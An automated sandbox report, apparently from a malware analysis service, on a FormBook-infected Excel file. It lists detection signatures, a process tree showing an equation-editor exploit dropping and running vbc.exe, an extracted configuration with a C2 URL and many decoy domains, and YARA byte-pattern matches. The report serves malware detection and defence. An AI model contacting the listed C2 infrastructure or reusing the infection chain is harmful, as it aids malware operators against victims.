Create Interactive Tour

Windows Analysis Report PO5594.xlsx

Overview

General Information

Sample Name:	PO5594.xlsx
Analysis ID:	513501
MD5:	ae8569edde3fe5d5e50f9669bbba54b0
SHA1:	fa19e75584925894b781bcdb1dc53c6b024f7b08
SHA256:	eceeb9918530b8ab023a2465bacc9c2e572c7aaa7add05df882e49c28fbe6e5b
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Sample uses process hollowing technique

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2124 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2580 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2856 cmdline: 'C:\Users\Public\vbc.exe' MD5: 11CBFA99FB5EBE8C09674E79B9834D96)

vbc.exe (PID: 1868 cmdline: 'C:\Users\Public\vbc.exe' MD5: 11CBFA99FB5EBE8C09674E79B9834D96)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

NETSTAT.EXE (PID: 2076 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)

cmd.exe (PID: 2036 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{
  "C2 list": [
    "www.passionfruitny.com/ddzw/"
  ],
  "decoy": [
    "azshalomcenter.com",
    "yumoo.design",
    "21pk.net",
    "zhauggim.xyz",
    "hoikhoinghiep.com",
    "1207rossmoyne.com",
    "izophoto.com",
    "spacex-live.net",
    "taskstudiox.com",
    "educationalsurprises.com",
    "5151vip16.com",
    "sarahannsartstudio.com",
    "indousmedicalscribing.com",
    "crossatlanticb.com",
    "codemnodum.com",
    "tvfret-america.online",
    "romualdoandrade.com",
    "creativeartsfilmacademy.club",
    "htsfrance.com",
    "bentonvilleartists.com",
    "reactivephysiorehab.com",
    "kencanatactical.com",
    "baycsolana.art",
    "komotoy.com",
    "metanetgateway.com",
    "daimondsofa.com",
    "cheese-box.online",
    "oeepa4a3bs.com",
    "consept-cafe.com",
    "thethomasgrouphomes.com",
    "marwatown.com",
    "daliborkamen.com",
    "taicholdingglobal.com",
    "palisadesstore.com",
    "adventuretravelsworld.com",
    "hamdykamal.net",
    "high-clicks3.com",
    "livebongdatv.com",
    "fiverrbetaa.xyz",
    "wardrobewish.com",
    "modsforcars.com",
    "schittstore.com",
    "toptanisimlik.com",
    "exteches.com",
    "kgkkristalljewels.com",
    "hpwdz.com",
    "talkaditown.com",
    "maininger.com",
    "preventgomohb.xyz",
    "juliamoranmartin.com",
    "flashpointyouth.com",
    "glenelg.store",
    "1courchevel.com",
    "snikido.com",
    "mikespotts.com",
    "memorylanecollections.com",
    "sportherd.com",
    "lesmariagesdesophie.com",
    "mammutphilippines.com",
    "shleppersmovingandstorage.com",
    "ervinowines.com",
    "kuwaitschoolsgame.com",
    "empiredigituseriness.com",
    "jyh8886.com"
  ]
}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.vbc.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.vbc.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.vbc.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.vbc.exe.400000.7.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.vbc.exe.400000.7.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.vbc.exe.400000.7.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.vbc.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.vbc.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
